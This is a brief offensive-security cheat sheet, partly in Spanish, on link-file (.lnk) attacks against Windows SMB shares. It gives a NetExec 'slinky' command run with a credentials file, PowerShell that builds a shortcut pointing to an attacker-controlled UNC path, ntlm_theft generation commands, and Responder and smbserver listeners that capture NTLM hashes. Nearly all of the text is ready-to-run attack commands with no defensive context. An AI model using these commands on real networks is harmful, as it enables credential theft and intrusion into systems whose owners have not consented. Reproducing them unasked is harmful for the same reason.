Link File Attacks
- Link File Attacks
-
Con NetExec
nxc smb 172.16.139.0/24 -u 'pthorpe' -p creds.txt -M slinky -o SERVER=172.16.139.10 NAME=urgent
- Manual:
- Código:
$objShell = New-Object -ComObject WScript.shell $lnk = $objShell.CreateShortcut("C:\test.lnk") $lnk.TargetPath = "\\192.168.138.149\@test.png" $lnk.WindowStyle = 1 $lnk.IconLocation = "%windir%\system32\shell32.dll, 3" $lnk.Description = "Test" $lnk.HotKey = "Ctrl+Alt+T" $lnk.Save()
smbserver.py -smb2support "icon" .
Con NTLM Theft
git clone https://github.com/Greenwolf/ntlm_theft
cd ntlm_theft
python3 ntlm_theft.py --generate all --server 10.10.14.48 --filename icon
impacket-smbclient USER:'PASSWORD'@fIP
- shares
- use share con acceso a escritura
sudo responder -I tun0
oimpacket-smbserver -smb2support shareName someDir